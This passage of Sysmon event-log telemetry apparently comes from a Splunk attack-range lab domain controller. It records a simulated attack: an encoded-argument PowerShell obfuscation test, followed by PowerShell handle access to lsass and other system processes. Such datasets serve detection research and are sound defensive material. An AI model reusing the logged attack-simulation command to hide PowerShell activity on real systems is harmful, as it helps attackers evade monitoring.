23542300x80000000000000001697771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B373446EFB0B271961C13699EAC39DE,SHA256=BE468D693FD5B37780B9A0659218D488838A0D4006996F93757B96AF2181DE3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.570{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E10AA19B8BBE16912647184B9F5E871,SHA256=6A5F5813BE8AA1D4854533BE9087C26CBCEAC57C54D90BE3EE0DFF7EDD3E235F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001697769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.497{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51662- 354300x80000000000000001697768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.451{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55165-false10.0.1.12-8000- 23542300x80000000000000001697767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.490{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5ECE90E663EFF9B720F25B78811614AE,SHA256=8F3770EE721FA5728095EB7994AF063DA5A0D2D6D000D8D3D68662B74E732309,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.427{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.427{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.374{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.374{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:47.349{05ADC7E1-70F3-603D-7C88-00000000AD01}8052\PSHost.132591129472668223.8052.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.349{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_oetlirdp.m30.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.349{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_viqmyt5n.jc0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.333{05ADC7E1-70F3-603D-7A88-00000000AD01}8468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.318{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_viqmyt5n.jc0.ps12021-03-01 22:55:47.318 10341000x80000000000000001697757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.302{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.274{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B13662F379B3A70D22148147D6EB93B8,SHA256=B2B1464AC2EFCA4D9DD342101B8DC67F83481BB80CC5CE19E4A552983A03C0A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.274{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.266{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.255{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.240{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=055D21B976A95D0CB24856EE8DFC1186,SHA256=54D65F2DC79DB38E807AB2C7A8A7DA685A4E21C4CADE9B0CC00B660E8A677CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.224{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=EA93D1A177325588FA48B00698057F99,SHA256=2499693F86F1030CFDF9FBAF33B92DFBFC233A1E4523D26CD6112931F8EDBDBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.224{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.224{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3CD214563043270BDD9D5306E3E6FE,SHA256=2F122E9A3E65EEED7666329E94A212A93A132672E3326288E924DFDC7C63F635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=467147DC55FCB9682239458B96B02AB8,SHA256=5ADC95F896CC42D27A09DA9B7902002D61369877B1701DA35C1EECDD95AD86B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF9389296EF9463B240F42D285D5E972,SHA256=8F558081AE141E150B98F2B5582BEAAFFCFBC80E990664B43D99480F7924BB24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.174{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 